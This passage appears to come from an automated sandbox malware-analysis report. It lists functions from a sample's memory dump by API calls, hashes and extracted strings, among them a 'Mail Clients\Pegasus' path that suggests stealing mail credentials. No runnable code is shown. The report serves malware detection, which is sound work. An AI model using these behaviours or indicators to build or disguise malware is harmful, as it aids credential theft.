                                                            • CloseHandle.KERNEL32(00000000), ref: 04224E95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleModuleName
                                                            • String ID:
                                                            • API String ID: 2106025501-0
                                                            • Opcode ID: d94bae1b59913256bf7e4af9c8c5c466c157ae71dd916d4649055dd816ca84e8
                                                            • Instruction ID: 2309360618dbe5dbb7b84db7c9e5663a4bf00e78cf96d6090d7d7e19771b5e4a
                                                            • Opcode Fuzzy Hash: d94bae1b59913256bf7e4af9c8c5c466c157ae71dd916d4649055dd816ca84e8
                                                            • Instruction Fuzzy Hash: 5FF0A031211130BBD2345B29ED4CF577F6CEF86B70F014615F619AB1E0D2B4A802C6D5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: UL6T$VL6T$VL6T
                                                            • API String ID: 0-1166735070
                                                            • Opcode ID: 9bed48560ca3b384b9a9f564c2ae7e0eec34a31771338bf98d0d52593d9e9e81
                                                            • Instruction ID: 57158fd3a55bf7c5751267557abde61375d9f5853315d593ec9440fdfc641bfc
                                                            • Opcode Fuzzy Hash: 9bed48560ca3b384b9a9f564c2ae7e0eec34a31771338bf98d0d52593d9e9e81
                                                            • Instruction Fuzzy Hash: 4C42F6F1F3021A9BEF24CF9889855BE76B4AF04711F240616E915FB394E370AA50D7A3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,$n_v$n_v
                                                            • API String ID: 0-3754569955
                                                            • Opcode ID: 0e10baba5f1820c9e62b13837b958635acf04d9a09fea5eb7d3276a35e9ff41f
                                                            • Instruction ID: e4f6b20cb47a34c95043c5b5e3b0e52a964cc1f4eed46b8ae77a69de95011386
                                                            • Opcode Fuzzy Hash: 0e10baba5f1820c9e62b13837b958635acf04d9a09fea5eb7d3276a35e9ff41f
                                                            • Instruction Fuzzy Hash: 27F13C70F301179BDF28DF58C8995BDBAF0AB45700F648527E501EA3E2E770A691CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ku^%$Ku^%$Mail Clients\Pegasus
                                                            • API String ID: 0-3776256347
                                                            • Opcode ID: 69303447eaede18a72e1c4aaef7c08798843526f7a0a7bd99bf296903903c389
                                                            • Instruction ID: 75bb47c0046e82cb5d8f77c6b786c0a6feb619236060b937def8105ba338cc34
                                                            • Opcode Fuzzy Hash: 69303447eaede18a72e1c4aaef7c08798843526f7a0a7bd99bf296903903c389
                                                            • Instruction Fuzzy Hash: B8E12BB1F3022A6FCF248E99CA815BF7E74AF45340F640526E515EB360EB64F980C796
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 9a%^$M%$M%
                                                            • API String ID: 0-3204844187
                                                            • Opcode ID: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                            • Instruction ID: 3f1a40093561ab62c6037d3a3fe0f6d8e127bb996cd25e23597de10fd2f9b1ab
                                                            • Opcode Fuzzy Hash: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                            • Instruction Fuzzy Hash: 9E817275F24639EBCF24CF5CC6C06ACBBB0AF04300F2495D6D415E7264E276AA81CB66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 3333$UUUU$UUUU
                                                            • API String ID: 0-1588839328
                                                            • Opcode ID: 17534d5a281498b08f04e5be694ea266bc4322b6d1202bf75d22475c47ae82c3
                                                            • Instruction ID: 9c3401715b1138bf0b6f1dba8a5fe4e19509ad712ec8accfd20d14bb821bbe56
                                                            • Opcode Fuzzy Hash: 17534d5a281498b08f04e5be694ea266bc4322b6d1202bf75d22475c47ae82c3
                                                            • Instruction Fuzzy Hash: D541A1B17246058FCB188F59C8C475277E6AFD8320F5981AAED058F39AE7B4D8C5CB80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$GetProcAddress.$l
                                                            • API String ID: 0-2784972518
                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction ID: 146e09ecf9d5328e4e0b558be605c6a6ff4e14acec4e23645b533189d3af5a7f
                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction Fuzzy Hash: EB316BB6A10609DFEB10CF99D880BADBBF5FF08724F14804AD541A7251D7B1FA45CBA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: y_B>$y_B>
                                                            • API String ID: 0-2639510964
                                                            • Opcode ID: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
                                                            • Instruction ID: 6f4d6bcd46b9811782b05ad19dbe69c72d2ecb36cfc4f64e7f410fd5d3bfa855
                                                            • Opcode Fuzzy Hash: 88ae354af438063a33d3c2dde5e6d733d8a20db6495eb275dc7889d5d4cf3e35
                                                            • Instruction Fuzzy Hash: A532B5F2F3521A8BDF24CE5988442BDBA70AB14312F195526F419FB251E3B4FB418F92
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            • Opcode ID: a052847ad604f4f6aac9229b62f97eaa10969126bdecdebac7787c9539404c8d
                                                            • Instruction ID: d57a2cd1f7b7a0ac6c1182c6f4e4659b5d3890612aab583da7e98d2e301bc91e
                                                            • Opcode Fuzzy Hash: a052847ad604f4f6aac9229b62f97eaa10969126bdecdebac7787c9539404c8d
                                                            • Instruction Fuzzy Hash: 55823171618341AFDB14CF18C880BABBBE5FF98304F44892DF989872A1D775E954CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: y_B>
                                                            • API String ID: 0-1404922283
                                                            • Opcode ID: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
                                                            • Instruction ID: d337f8c5cf4d74f36eed5cd917acbd99e9e63cd7e0449af4773da6cf00eadc98
                                                            • Opcode Fuzzy Hash: 3469851243814c9df854399b7f1dc1d22a233d7ef834371f5d1686ee01f1e3c4
                                                            • Instruction Fuzzy Hash: D6123C7172C362ABCB24AF28D6D053DB6E1AFC8750F254A1EE196CB350E674E480DB07
                                                            APIs
                                                              • Part of subcall function 04250597: RtlAllocateHeap.NTDLL(00000008,?,04236A8C), ref: 042505D8
                                                            • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 042522BE
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 04252339
                                                            • FindClose.KERNEL32(00000000), ref: 0425235B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$AllocateCloseFirstHeapNext
                                                            • String ID:
                                                            • API String ID: 2963102669-0
                                                            • Opcode ID: 11130e8ba43ef9a754539bc983f7f1652457a0f25efbe84c150eaa5e199ad3f8
                                                            • Instruction ID: df804637c4e6e6c88a963aa48284f3ff5929b364430614300e8ad3f0bb05121c
                                                            • Opcode Fuzzy Hash: 11130e8ba43ef9a754539bc983f7f1652457a0f25efbe84c150eaa5e199ad3f8
                                                            • Instruction Fuzzy Hash: 9541EA7671021AEFEB14AEA8DC84DBFB369EB80358F1445A9ED15D7190FA30BD448A70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0
                                                            • API String ID: 0-4108050209
                                                            • Opcode ID: d368bac3811ff53457a2cb311bf3a0af827fa309b1fb3d430375599c5b749556
                                                            • Instruction ID: 2f83fa9bf28ec3b60dd73e12b34cc50636138c12e646a290bffd0e2dd2e1947c
                                                            • Opcode Fuzzy Hash: d368bac3811ff53457a2cb311bf3a0af827fa309b1fb3d430375599c5b749556
                                                            • Instruction Fuzzy Hash: 77C1FD74B20606CFDB2DCF6AC48067EBBA1EFC5394F144699E8929B290D770B845CB71
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DestroyHeap
                                                            • String ID:
                                                            • API String ID: 2435110975-0
                                                            • Opcode ID: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
                                                            • Instruction ID: 8527217ce4d0d0c3e470629f962d3987323b2ed86d2de5aad596d46d146cd0ba
                                                            • Opcode Fuzzy Hash: 91d73e85b2a2822530c45d3b6883030419f9aca911568a6b6bc4a0346bb9264a
                                                            • Instruction Fuzzy Hash: 79115EB1900B84CFD721CF699845B9AFBF4FB49710F04C62AE4A997740D3786805CFA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: U
                                                            • API String ID: 0-3372436214
                                                            • Opcode ID: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
                                                            • Instruction ID: 4dc649b3f8ed8243d8a6abd08b978ee8f8a4358725c613413891c1272ad71460
                                                            • Opcode Fuzzy Hash: 8bc74e86ad7892e45763c7c2175561076085692adc4a2a21e1bd7b970ee0b1f8
                                                            • Instruction Fuzzy Hash: 9791B671B283419BCB649F188C8163DBAE0AFA4750F164D2FE8C6CA271E270E584DB57
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
                                                            • Instruction ID: 7cfea7e06edd418942b86eab24f49515d981de66c649673de0aeb6967dc8bb47
                                                            • Opcode Fuzzy Hash: c69a6815894f7947a6a0542994c29682853ba558057bf9cd49837bbb9556ffd7
                                                            • Instruction Fuzzy Hash: 46624731618741CFD725DF18C080A6AB7E2FF98314F148AADE8CA9B361D675F846CB52
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: caaf1d4bcde0c24294baec86a5e2eb3cea651728695487e10075cc7e93abdcfa
                                                            • Instruction ID: 4eea6329d34351d48fd293f1f2f257295656cab3bd10129676d7e83e73ba8ab5
                                                            • Opcode Fuzzy Hash: caaf1d4bcde0c24294baec86a5e2eb3cea651728695487e10075cc7e93abdcfa
                                                            • Instruction Fuzzy Hash: DD1288B0628741CFD324CF28C48066ABBE2FBA5314F144E2DD5D687BA1E776B445CB45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7c5bfcb74d64b106436c267bea2b2e9854b0246cc83a94d6d7658a636303708
                                                            • Instruction ID: 460b055fdb5b6ad8fbce4cd5214cf7820ee73be099995be3f5939c4fa3150959
                                                            • Opcode Fuzzy Hash: b7c5bfcb74d64b106436c267bea2b2e9854b0246cc83a94d6d7658a636303708
                                                            • Instruction Fuzzy Hash: 2D02A4B1F3020AABDF24DE98D8956BD7BF1AB04350F14852AD515EA2E2E374E5C0CF52
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 268e8702608a6b90ebe5f704738b9a629cec0ea57dbf574d3ec40b0b1ed608f4
                                                            • Instruction ID: 3aa45bdd258de38d3bfd94e476f81a9ddb09e88725d1be7fda417b7c251f9919
                                                            • Opcode Fuzzy Hash: 268e8702608a6b90ebe5f704738b9a629cec0ea57dbf574d3ec40b0b1ed608f4
                                                            • Instruction Fuzzy Hash: 3EE1E6F1F3010A8BDF249F9C98811BD7A70AB06316F24052BD115EB3A1E6F5E9C18B93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 13b49794fb555ce5a457b705e9d36dc15405e88024e94027de3508aab2a8635c
                                                            • Instruction ID: e65c2b55498da7b856312da821319bab781e81a48908d550f7d1c3b7e56d1530
                                                            • Opcode Fuzzy Hash: 13b49794fb555ce5a457b705e9d36dc15405e88024e94027de3508aab2a8635c
                                                            • Instruction Fuzzy Hash: 5FC18170608386DFD715CF28D48469ABFE1BF65304F04865DE8989B352D370EA68CB92
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 404008158dafff43aec7ad6a46d065142d89c1995864d67ae93c323eefc80fdb
                                                            • Instruction ID: 114f7c592c1df90eccdffcdd27c396b7bc613fba7f08a6cbebeaf153936748b3
                                                            • Opcode Fuzzy Hash: 404008158dafff43aec7ad6a46d065142d89c1995864d67ae93c323eefc80fdb
                                                            • Instruction Fuzzy Hash: A581B2726083154FD308CF59C95231AFBD6ABC8310F4AC53EE9959B7A1E6B8DC058BC5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a8cd4802bb5dde251916ee4563a48a6af48aeae2953e1db2d908d410a145637
                                                            • Instruction ID: d4c6a089bcc5e3a9aa8b348606774173ed45e96c0d66c1020890f9714c9290bd
                                                            • Opcode Fuzzy Hash: 4a8cd4802bb5dde251916ee4563a48a6af48aeae2953e1db2d908d410a145637
                                                            • Instruction Fuzzy Hash: 5D714562F3056E7ADF24899C8F40D7D26B1A784314F274623E209DA2A0E7F9B940F652
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 8976ad82445888a3523337de21bd725d268fd77f590c92d331c08a3a482d989a
                                                            • Instruction ID: b4b036716937334d3c5f9e5327f5ffc63436054ba59f691543f9e2cd465420ad
                                                            • Opcode Fuzzy Hash: 8976ad82445888a3523337de21bd725d268fd77f590c92d331c08a3a482d989a
                                                            • Instruction Fuzzy Hash: 5171C371F383A6FBCB28EF598A8162DB6E0AB84700F154D2FE585DB250D274E884C747
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 54117711b5b6f3e3548b285e01c7f3ff021aa8cd1369d00f9261af8dca8f2be9
                                                            • Instruction ID: f922b6f387c1c42e97c5b23efdb07acbe24db02577c661be741248006141997a
                                                            • Opcode Fuzzy Hash: 54117711b5b6f3e3548b285e01c7f3ff021aa8cd1369d00f9261af8dca8f2be9
                                                            • Instruction Fuzzy Hash: F6511873B106164FC34CEE7C8D92169F6D6ABC8240F46CA3EE44ADB391F970DA12C681
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                            • Instruction ID: 4c7c3454d924f775e2a6dfa8eee3b2f112dc3b040aadd13e0e516eaa0aefac3a
                                                            • Opcode Fuzzy Hash: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                            • Instruction Fuzzy Hash: B951BB30F24237EBCF248ADC8A40A7EB7B4AB05610F514697E611F7291D676E984CF63
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                            • Instruction ID: b4e31d36fea51be608d4d501e001d6b478ba6f6829eaf57c4d9754cf49fb75f2
                                                            • Opcode Fuzzy Hash: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                            • Instruction Fuzzy Hash: 6D21F8B1724722BFC728AE1CDE4052DB2D5AB85210F14497BF86AEF750E270EC408783
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
                                                            • Instruction ID: 683076b847868f7c2f3f51f2a3f27ab4dde7f7eb9a715087091fe4665f2d69f9
                                                            • Opcode Fuzzy Hash: 66ff2f2a13dd8e2f3e7900633aa22c2d0bddf0cea2b0e0fcf3d4903cf0c1afe8
                                                            • Instruction Fuzzy Hash: 84216D72A1022A9FCB24CF18C990A6AB7A1FF85718F68855CC8459B342D771F842CB91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
                                                            • Instruction ID: 7e95ff51e3836f3cf9a8eff7789caab2191373348289b497013f71410d323535
                                                            • Opcode Fuzzy Hash: c0cbf25b4c85234f202655fa8cc2e504dfd54c569fa544efbece1cc302c4c175
                                                            • Instruction Fuzzy Hash: C6118A77A2427107D711CE7558E012AF7A2ABC622270F4275D982EB652C530EC5582D5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                            • Instruction ID: fc80ff171ad150b496fd9bb7b648541e5d288e1a345aca2e49a28a9ce9a563ca
                                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                            • Instruction Fuzzy Hash: 8301A7767106058FEF21CF24E804FAA33F9EB86215F4584A5E906D72C3E774B941CB90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                            • Instruction ID: 1bbbcd3a4aefeceeb4ff2a8dc399c8a73a5061bf8a75abebae2535d6cada58ba
                                                            • Opcode Fuzzy Hash: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                            • Instruction Fuzzy Hash: 9BE0EC72A21278EBCB19DB99CA4498AF3ECEBC5B54F5644A6F905D3110C270EE00C7D4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                            • Instruction ID: 07f262be0c53051f665b25bb0c3dbd264e452315670e0e9dd572fecb2d286ecc
                                                            • Opcode Fuzzy Hash: d6d0ec938ce4093d67a2cf61a3cc3f8e03a2e4f7c65607b08f985ba338c785d5
                                                            • Instruction Fuzzy Hash: 7AE09A75A116859ED7128F25E9A4B007BA1E714A14F458075E405D7A79F3B47880CF4A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
                                                            • Instruction ID: 8767e4e64b46a92352bfdd40661a147fff64ceb884ab37cc795abae3ef0d819b
                                                            • Opcode Fuzzy Hash: d46244e68fc71b8cbf41339a9e21dde89906441e25df86e8e15a46fb3bb963b5
                                                            • Instruction Fuzzy Hash: 76D01231265650AFCA46DB58CE50F00B3A0AB88A32F2582A0B820AB2F1C620EA01CA01
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
                                                            • Instruction ID: c0944383d73aac26117361346b053748916b56d97ab65fadc12e4df891c8d7e9
                                                            • Opcode Fuzzy Hash: adb50997bff8f6b42dea5567a3e80c24e84f9fd98b00b9a5e01fe7e8c8691b55
                                                            • Instruction Fuzzy Hash: 7AB00279661540CFCA55CF08C198E00F3F4FB48760B068491EC05CB722C234ED41CA10
                                                            APIs
                                                            • type_info::operator==.LIBVCRUNTIME ref: 04259D25
                                                            • CatchIt.LIBVCRUNTIME ref: 04259E84
                                                            • _UnwindNestedFrames.LIBCMT ref: 04259F85
                                                            • CallUnexpected.LIBVCRUNTIME ref: 04259FA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 2332921423-393685449
                                                            • Opcode ID: 4d4d2abbed9b856c4e49574ec055b924c190fec3ea5a9e19aedb67fed442bc91
                                                            • Instruction ID: b9d2f51ceed64e2f1ad7bdb1aac960b44597842c2cc6a3f62b2518fb96b93932
